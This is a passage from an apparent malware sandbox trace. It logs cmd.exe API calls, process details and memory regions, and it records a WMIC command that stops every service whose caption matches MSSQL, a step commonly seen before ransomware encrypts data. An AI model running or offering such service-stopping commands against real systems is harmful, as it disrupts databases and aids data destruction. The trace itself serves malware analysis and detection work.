(_String1="WMIC", _String2="CLS") returned 20 [0103.338] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0103.338] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0103.338] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0103.338] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0103.338] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0103.338] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0103.338] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0103.338] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0103.338] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0103.338] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0103.338] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0103.338] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0103.338] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0103.338] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0103.338] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0103.338] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0103.338] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0103.338] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0103.338] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0103.338] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0103.338] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0103.338] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0103.339] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0103.339] SetErrorMode (uMode=0x0) returned 0x0 [0103.339] SetErrorMode (uMode=0x1) returned 0x0 [0103.339] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x45905d0, lpFilePart=0x456f354 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x456f354*="Desktop") returned 0x1d [0103.339] SetErrorMode (uMode=0x0) returned 0x1 [0103.339] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0103.339] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0103.344] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0103.345] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.345] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x456f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x456f0e0) returned 0xffffffff [0103.345] GetLastError () returned 0x2 [0103.345] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.345] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x456f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x456f0e0) returned 0xffffffff [0103.345] GetLastError () returned 0x2 [0103.345] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.346] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x456f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x456f0e0) returned 0xffffffff [0103.346] GetLastError () returned 0x2 [0103.346] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.346] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x456f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x456f0e0) returned 0xffffffff [0103.346] GetLastError () returned 0x2 [0103.346] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0103.346] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x456f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x456f0e0) returned 0x459b220 [0103.346] FindClose (in: hFindFile=0x459b220 | out: hFindFile=0x459b220) returned 1 [0103.346] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x456f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x456f0e0) returned 0xffffffff [0103.346] GetLastError () returned 0x2 [0103.346] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x456f0e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x456f0e0) returned 0x459b220 [0103.346] FindClose (in: hFindFile=0x459b220 | out: hFindFile=0x459b220) returned 1 [0103.346] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0103.346] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0103.346] GetConsoleTitleW (in: lpConsoleTitle=0x456f5d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0103.347] InitializeProcThreadAttributeList (in: lpAttributeList=0x456f500, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x456f4e4 | out: lpAttributeList=0x456f500, lpSize=0x456f4e4) returned 1 [0103.347] UpdateProcThreadAttribute (in: lpAttributeList=0x456f500, dwFlags=0x0, Attribute=0x60001, lpValue=0x456f4ec, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x456f500, lpPreviousValue=0x0) returned 1 [0103.347] GetStartupInfoW (in: lpStartupInfo=0x456f538 | out: lpStartupInfo=0x456f538*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0103.347] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0103.348] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0103.348] lstrcmpW (lpString1="\\WMIC.exe", lpString2="\\XCOPY.EXE") returned -1 [0103.348] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0x456f488*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x456f4d4 | out: lpCommandLine="WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE", lpProcessInformation=0x456f4d4*(hProcess=0xa8, hThread=0xa4, dwProcessId=0xc48, dwThreadId=0xc4c)) returned 1 [0103.354] CloseHandle (hObject=0xa4) returned 1 [0103.354] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0103.354] GetEnvironmentStringsW () returned 0x4599f38* [0103.354] FreeEnvironmentStringsA (penv="=") returned 1 [0103.354] WaitForSingleObject (hHandle=0xa8, dwMilliseconds=0xffffffff) returned 0x0 [0104.342] GetExitCodeProcess (in: hProcess=0xa8, lpExitCode=0x456f46c | out: lpExitCode=0x456f46c*=0x0) returned 1 [0104.342] CloseHandle (hObject=0xa8) returned 1 [0104.342] _vsnwprintf (in: _Buffer=0x456f554, _BufferCount=0x13, _Format="%08X", _ArgList=0x456f474 | out: _Buffer="00000000") returned 8 [0104.342] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0104.342] GetEnvironmentStringsW () returned 0x459b428* [0104.342] FreeEnvironmentStringsA (penv="=") returned 1 [0104.342] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0104.342] GetEnvironmentStringsW () returned 0x459b428* [0104.342] FreeEnvironmentStringsA (penv="=") returned 1 [0104.343] DeleteProcThreadAttributeList (in: lpAttributeList=0x456f500 | out: lpAttributeList=0x456f500) [0104.343] _get_osfhandle (_FileHandle=1) returned 0x3c [0104.343] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0104.343] _get_osfhandle (_FileHandle=1) returned 0x3c [0104.343] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0104.343] _get_osfhandle (_FileHandle=0) returned 0x38 [0104.343] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0104.343] SetConsoleInputExeNameW () returned 0x1 [0104.343] GetConsoleOutputCP () returned 0x1b5 [0104.343] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0104.343] SetThreadUILanguage (LangId=0x0) returned 0x409 [0104.344] exit (_Code=0) Thread: id = 136 os_tid = 0xc44 Process: id = "23" image_name = "conhost.exe" filename = "c:\\windows\\system32\\conhost.exe" page_root = "0x8955000" os_pid = "0xc34" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0xc2c" cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1" cur_dir = "C:\\Windows" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1525 start_va = 0x7fad9000 end_va = 0x7fad9fff entry_point = 0x0 region_type = private name = "private_0x000000007fad9000" filename = "" Region: id = 1526 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1527 start_va = 0x3c1bc60000 end_va = 0x3c1bc7ffff entry_point = 0x0 region_type = private name = "private_0x0000003c1bc60000" filename = "" Region: id = 1528 start_va = 0x3c1bc80000 end_va = 0x3c1bc93fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003c1bc80000" filename = "" Region: id = 1529 start_va = 0x3c1bca0000 end_va = 0x3c1bcdffff entry_point = 0x0 region_type = private name = "private_0x0000003c1bca0000" filename = "" Region: id = 1530 start_va = 0x7df5ff6b0000 end_va = 0x7ff5ff6affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff6b0000" filename = "" Region: id = 1531 start_va = 0x7ff6c48e0000 end_va = 0x7ff6c4902fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c48e0000" filename = "" Region: id = 1532 start_va = 0x7ff6c4909000 end_va = 0x7ff6c4909fff entry_point = 0x0 region_type = private name = "private_0x00007ff6c4909000" filename = "" Region: id = 1533 start_va = 0x7ff6c490e000 end_va = 0x7ff6c490ffff entry_point = 0x0 region_type = private name = "private_0x00007ff6c490e000" filename = "" Region: id = 1534 start_va = 0x7ff6c4950000 end_va = 0x7ff6c4960fff entry_point = 0x7ff6c4950000 region_type = mapped_file name = "conhost.exe" filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe") Region: id = 1535 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1536 start_va = 0x3c1be50000 end_va = 0x3c1bf4ffff entry_point = 0x0 region_type = private name = "private_0x0000003c1be50000" filename = "" Region: id = 1537 start_va = 0x7ffc01360000 end_va = 0x7ffc0153cfff entry_point = 0x7ffc01360000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1538 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1539 start_va = 0x3c1bc60000 end_va = 0x3c1bc6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003c1bc60000" filename = "" Region: id = 1540 start_va = 0x3c1bc70000 end_va = 0x3c1bc76fff entry_point = 0x0 region_type = private name = "private_0x0000003c1bc70000" filename = "" Region: id = 1541 start_va = 0x3c1bce0000 end_va = 0x3c1bd9dfff entry_point = 0x3c1bce0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1542 start_va = 0x3c1bda0000 end_va = 0x3c1bddffff entry_point = 0x0 region_type = private name = "private_0x0000003c1bda0000" filename = "" Region: id = 1543 start_va = 0x3c1bde0000 end_va = 0x3c1bde0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003c1bde0000" filename = "" Region: id = 1544 start_va = 0x3c1bdf0000 end_va = 0x3c1bdf6fff entry_point = 0x0 region_type = private name = "private_0x0000003c1bdf0000" filename = "" Region: id = 1545 start_va = 0x3c1be00000 end_va = 0x3c1be0ffff entry_point = 0x0 region_type = private name = "private_0x0000003c1be00000" filename = "" Region: id = 1546 start_va = 0x3c1be10000 end_va = 0x3c1be10fff entry_point = 0x0 region_type = private name = "private_0x0000003c1be10000" filename = "" Region: id = 1547 start_va = 0x3c1be20000 end_va = 0x3c1be20fff entry_point = 0x0 region_type = private name = "private_0x0000003c1be20000" filename = "" Region: id = 1548 start_va = 0x3c1bf50000 end_va = 0x3c1c0d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003c1bf50000" filename = "" Region: id = 1549 start_va = 0x3c1c0e0000 end_va = 0x3c1c260fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003c1c0e0000" filename = "" Region: id = 1550 start_va = 0x3c1c270000 end_va = 0x3c1d66ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000003c1c270000" filename = "" Region: id = 1551 start_va = 0x7ff6c47e0000 end_va = 0x7ff6c48dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff6c47e0000" filename = "" Region: id = 1552 start_va = 0x7ff6c490c000 end_va = 0x7ff6c490dfff entry_point = 0x0 region_type = private name = "private_0x00007ff6c490c000" filename = "" Region: id = 1553 start_va = 0x7ffbf6a10000 end_va = 0x7ffbf6a62fff entry_point = 0x7ffbf6a10000 region_type = mapped_file name = "conhostv2.dll" filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll") Region: id = 1554 start_va = 0x7ffbfd5b0000 end_va = 0x7ffbfd732fff entry_point = 0x7ffbfd5b0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1555 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1556 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1557 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1558 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1559 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1560 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1561 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1562 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1563 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1564 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Thread: id = 133 os_tid = 0xc38 Thread: id = 134 os_tid = 0xc3c Thread: id = 135 os_tid = 0xc40 Process: id = "24" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x8e95000" os_pid = "0xc48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "22" os_parent_pid = "0xc2c" cmd_line = "WMIC SERVICE WHERE 'caption LIKE '%MSSQL%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1578 start_va = 0x980000 end_va = 0x99ffff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1579 start_va = 0x9a0000 end_va = 0x9a1fff entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 1580 start_va = 0x9b0000 end_va = 0x9c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009b0000" filename = "" Region: id = 1581 start_va = 0x9d0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 1582 start_va = 0xa10000 end_va = 0xa4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1583 start_va = 0xa50000 end_va = 0xa53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a50000" filename = "" Region: id = 1584 start_va = 0xa60000 end_va = 0xa60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a60000" filename = "" Region: id = 1585 start_va = 0xa70000 end_va = 0xa71fff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 1586 start_va = 0x1300000 end_va = 0x1363fff entry_point = 0x1300000 region_type = mapped_file name = "wmic.exe" filename = "\\Windows\\SysWOW64\\wbem\\WMIC.exe" (normalized: "c:\\windows\\syswow64\\wbem\\wmic.exe") Region: id = 1587 start_va = 0x1370000 end_va = 0x536ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001370000" filename = "" Region: id = 1588 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1589 start_va = 0x7e930000 end_va = 0x7e952fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e930000" filename = "" Region: id = 1590 start_va = 0x7e95a000 end_va = 0x7e95afff entry_point = 0x0 region_type = private name = "private_0x000000007e95a000" filename = "" Region: id = 1591 start_va = 0x7e95c000 end_va = 0x7e95efff entry_point = 0x0 region_type = private name = "private_0x000000007e95c000" filename = "" Region: id = 1592 start_va = 0x7e95f000 end_va = 0x7e95ffff entry_point = 0x0 region_type = private name = "private_0x000000007e95f000" filename = "" Region: id = 1593 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1594 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1595 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 1596 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1597 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 1598 start_va = 0xad0000 end_va = 0xadffff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 1599 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1600 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1601 start_va = 0xcb0000 end_va = 0xdaffff entry_point = 0x0 region_type = private name = "private_0x0000000000cb0000" filename = "" Region: id = 1602 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1603 start_va = 0x980000 end_va = 0x98ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000980000" filename = "" Region: id = 1604 start_va = 0x990000 end_va = 0x993fff entry_point = 0x0 region_type = private name = "private_0x0000000000990000" filename = "" Region: id = 1605 start_va = 0xa80000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 1606 start_va = 0xae0000 end_va = 0xb9dfff entry_point = 0xae0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1607 start_va = 0xba0000 end_va = 0xbdffff entry_point = 0x0 region_type = private name = "private_0x0000000000ba0000" filename = "" Region: id = 1608 start_va = 0xf40000 end_va = 0xf4ffff entry_point = 0x0 region_type = private name = "private_0x0000000000f40000" filename = "" Region: id = 1609 start_va = 0x74a30000 end_va = 0x74a6efff entry_point = 0x74a30000 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 1610 start_va = 0x74b60000 end_va = 0x74b67fff entry_point = 0x74b60000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\SysWOW64\\winnsi.dll" (normalized: "c:\\windows\\syswow64\\winnsi.dll") 